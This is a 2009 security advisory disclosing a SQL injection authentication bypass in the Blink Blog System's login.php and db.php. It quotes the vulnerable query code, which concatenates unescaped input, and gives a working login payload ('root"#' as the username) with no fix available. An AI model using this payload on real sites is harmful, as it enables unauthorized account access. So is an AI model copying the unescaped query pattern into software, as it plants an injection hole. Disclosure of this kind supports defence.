-- Salvatore Fresta aka drosophila CWNP444351
******** Salvatore "drosophila" Fresta ******** [+] Application: Blink Blog System [+] Version: Unknown [+] Website: http://blogink.sourceforge.net [+] Bugs: [A] Authentication Bypass [+] Exploitation: Remote [+] Date: 03 Aug 2009 [+] Discovered by: Salvatore Fresta aka drosophila [+] Author: Salvatore Fresta aka drosophila [+] E-mail: drosophilaxxx [at] gmail.com *************************************************** [+] Menu 1) Bugs 2) Code 3) Fix *************************************************** [+] Bugs There are many SQL Injection flaws but I post the only one that allows a guest to bypass the login. - [A] Authentication Bypass [-] Risk: medium [-] Requisites: magic_quotes_gpc = off [-] File affected: login.php, db.php This bug allows a guest to bypass the login. login.php: ... $username = $_POST["nick"]; $password = md5($_POST["password"]); if ($data = $DB->usercheck($username, $password)) ... db.php: function usercheck($username, $password) { $try = mysql_query("SELECT * FROM users WHERE nick=\"".$username."\" AND password=\"".$password."\" "); ... *************************************************** [+] Code - [A] Authentication Bypass username: root"# password: foo *************************************************** [+] Fix No fix. ***************************************************